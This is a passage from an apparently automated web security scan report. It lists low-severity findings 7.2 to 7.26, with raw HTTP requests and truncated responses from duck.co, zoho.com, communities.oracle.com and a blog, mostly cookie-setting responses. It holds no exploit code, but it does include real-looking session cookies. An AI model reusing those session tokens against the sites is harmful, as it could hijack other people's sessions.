User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=7d3e82ff-ab2d-4eba-994a-a42bd8a69509; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948216140; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=47CD6EF4F2FBFB5A52C054FF42EDD89F; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:56:55 GMT
Server: ZWS
Content-Length: 33823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...

7.2. http://ahmy.yulrizka.com/2011/02/my-own-url-shortening/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ahmy.yulrizka.com
Path:   /2011/02/my-own-url-shortening/

Request

GET /2011/02/my-own-url-shortening/ HTTP/1.1
Host: ahmy.yulrizka.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=6106c1def82669e1bf13343e8a120fc6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=ahmy.yulrizka.com
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 27-Feb-2012 16:30:59 GMT; path=/
X-Pingback: http://ahmy.yulrizka.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://ahmy.tk/k>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:f
...[SNIP]...

7.3. https://communities.oracle.com/portal/server.pt/community/support/219  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://communities.oracle.com
Path:   /portal/server.pt/community/support/219

Request

GET /portal/server.pt/community/support/219 HTTP/1.1
Host: communities.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:28:15 GMT
Cache-Control: no-cache="set-cookie"
Location: https://communities.oracle.com/portal/SSOServlet;jsessionid=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517?
Set-Cookie: JSESSIONID=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517; path=/
Set-Cookie: plloginoccured=false; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain
Connection: close
Set-Cookie: comnap_V1=3809317517.25118.0000; path=/
Content-Length: 451

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://communities.oracle.com/por
...[SNIP]...

7.4. http://discuss.zoho.com/getCustomFile.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://discuss.zoho.com
Path:   /getCustomFile.do

Request

GET /getCustomFile.do?fileId=28469000000397054&forumGroupId=28469000000003003 HTTP/1.1
Host: discuss.zoho.com
Proxy-Connection: keep-alive
Referer: http://duck.co/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=edf2c51a-eaa2-4263-9f8d-c7c236409e3a; Path=/
Pragma: no-cache
Cache-Control: max-age=1296000, must-revalidate
Expires: Wed, 16 Mar 2011 02:59:06 PDT
Set-Cookie: JSESSIONID=F9A07ED571A5BE950619D83F9EE01094; Path=/
Last-Modified: Mon, 27 Dec 2010 10:56:14 PST
Content-Disposition: inline;filename="yegg.jpg"
Content-Type: image/jpeg;charset=UTF-8
Date: Tue, 01 Mar 2011 01:59:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 157949

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
..a...L1......h..........................................................................................................................
...[SNIP]...

7.5. http://duck.co/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /

Request

GET / HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/spread.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=a2a25e54-6029-4a8b-8ad5-393faa48b3b4; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A9C48BE5504506667F9F568AF077DC3B; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:01:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 270075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.6. http://duck.co/duckduckgo-forum  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /duckduckgo-forum

Request

GET /duckduckgo-forum HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=03CE9095DFD4F307FAACCBA63C597A6A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.7. http://duck.co/feed  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /feed

Request

GET /feed HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2C54A5C3D37DE1A7D7F33252A4C8A7AA; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>duck.co - The DuckDuckGo Community</title>
       <atom:link href="htt
...[SNIP]...

7.8. http://duck.co/js/crossdomain.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /js/crossdomain.js

Request

GET /js/crossdomain.js HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duck.co/html/blank.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zdccn=04bb52f0-790c-4a32-8ddb-c2706be7de34; JSESSIONID=D5909C35AB518D9214040EC162CA2063

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=ED6C6FE81BC97D19E29F84258539BAB5; Path=/
ETag: W/"978-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 978
Date: Tue, 01 Mar 2011 02:43:38 GMT
Server: Apache-Coyote/1.1

//$Id$
// include this in iframe which uses parent.* in safari

if((((navigator.userAgent).indexOf("Safari")!=-1)))
{
var curdomain = document.domain;
if(curdomain.indexOf("zoho.com")!
...[SNIP]...

7.9. http://duck.co/jsp/i18nConstants.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /jsp/i18nConstants.jsp

Request

GET /jsp/i18nConstants.jsp HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=0F105B745A6E8A7810D10C4D9FE55208; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Connection: close


7.10. http://duck.co/portalLogin.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /portalLogin.do

Request

GET /portalLogin.do HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 500 LESS_THAN_MIN_OCCURANCE
Set-Cookie: JSESSIONID=BC721FB723168FB555D31708EE3287FF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
   <div class="headerAre
...[SNIP]...

7.11. http://duck.co/sendFeedback.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /sendFeedback.do

Request

GET /sendFeedback.do HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 500 POST_ONLY_URL
Set-Cookie: JSESSIONID=EEDB2249A75BF86962BD8EA9FCC98F8F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
   <div class="headerAre
...[SNIP]...

7.12. http://duck.co/styles/discussions-styles.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /styles/discussions-styles.css

Request

GET /styles/discussions-styles.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: duck.co

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=76d582f3-1fdc-47e6-b1a8-f96c8670f753; Path=/
Set-Cookie: JSESSIONID=865ACBC02CD9799C74E0E20240A16F5F; Path=/
ETag: W/"128207-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:00:00 GMT
Server: Apache-Coyote/1.1
Content-Length: 128207

/* $Id$ */

/* CSS Document */
/***********************COMMON STYLES ***********************/
html, body {
height: 100%;
}
body {
   background:#eee;
   font:12px arial,verdana, Helvetica, sans-serif;
   li
...[SNIP]...

7.13. http://duck.co/styles/editorStyles.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /styles/editorStyles.css

Request

GET /styles/editorStyles.css HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duck.co/html/blank.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zdccn=04bb52f0-790c-4a32-8ddb-c2706be7de34; JSESSIONID=D5909C35AB518D9214040EC162CA2063

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=9FAF2B09DC417E0A36F492EAA6FF635A; Path=/
ETag: W/"19117-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Content-Length: 19117

/* $Id$ */

body {
font-family:Arial;padding:0px;margin:0 0;
}
pre.likeCode {height:auto;overflow:auto;border:1px dotted #efefef;padding:3px;}

/*** Toolbar Styles ***/

.toolBar{ background:url(../i
...[SNIP]...

7.14. http://duck.co/styles/errorpage.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /styles/errorpage.css

Request

GET /styles/errorpage.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: duck.co

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=dc03a510-2de9-48b5-b214-3a62814ce002; Path=/
Set-Cookie: JSESSIONID=83567F0EDDE5E5723853BB6BA7DE846D; Path=/
ETag: W/"8656-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:00:00 GMT
Server: Apache-Coyote/1.1
Content-Length: 8656

/* $Id$ */
body { font-family:Arial, Helvetica, sans-serif;background:#fff;}
img, a{border:0px;outline:none;}
.flLeft {float:left;}
.flRight {float:right;}
.clearBoth {clear:both;}
.resetMargin{margin
...[SNIP]...

7.15. http://duck.co/subscribeRegister.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /subscribeRegister.do

Request

GET /subscribeRegister.do HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0A28593006994C23F93C4D725E7E35A5; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 197
Date: Tue, 01 Mar 2011 02:43:37 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

</body>
</html>

7.16. http://duck.co/topic/2-25-news-stories-to-comment-on  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/2-25-news-stories-to-comment-on

Request

GET /topic/2-25-news-stories-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D0B608D9442F784216B5FC01D1EB9A5B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.17. http://duck.co/topic/2-28-articles-to-comment-on  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/2-28-articles-to-comment-on

Request

GET /topic/2-28-articles-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=984DDA7C2B124E92DA5A859E1908E7FE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.18. http://duck.co/topic/about-com-s-web-search-readers-choice-awards  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/about-com-s-web-search-readers-choice-awards

Request

GET /topic/about-com-s-web-search-readers-choice-awards HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EA504D28C3373D6972381FB81A118E08; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.19. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/boolean-operators-and-parentheses-for-search-query

Request

GET /topic/boolean-operators-and-parentheses-for-search-query HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8D492D5F2B3314011FA3DFF669B9B2A3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.20. http://duck.co/topic/cached-archived-links  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/cached-archived-links

Request

GET /topic/cached-archived-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2D18B5685088F93E9708F7E2CD57BE4B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.21. http://duck.co/topic/changing-font-text-and-links  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/changing-font-text-and-links

Request

GET /topic/changing-font-text-and-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5C5C657414E39DB2D3B3C199E1681D85; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:41 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.22. http://duck.co/topic/ddg-gg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/ddg-gg

Request

GET /topic/ddg-gg HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EF1488160928C3C8A4FA6F8C9543B21F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.23. http://duck.co/topic/ddg-in-alternative-web-browsers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/ddg-in-alternative-web-browsers

Request

GET /topic/ddg-in-alternative-web-browsers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8A7BFA57C8B91069E62F967900D1C13B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.24. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/ddg-is-one-of-zoho-s-esteemed-customers

Request

GET /topic/ddg-is-one-of-zoho-s-esteemed-customers HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BC7E72EEA63DCAC3A4A6DA3442AC97E8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:44 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.25. http://duck.co/topic/ddg-own-search-engine  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/ddg-own-search-engine

Request

GET /topic/ddg-own-search-engine HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=09986BF0E025E92D61B96C8BA90EE858; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:43:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...

7.26. http://duck.co/topic/ddg-userbar-to-spread-the-word  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://duck.co
Path:   /topic/ddg-userbar-to-spread-the-word

Request

GET /topic/ddg-userbar-to-spread-the-word HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
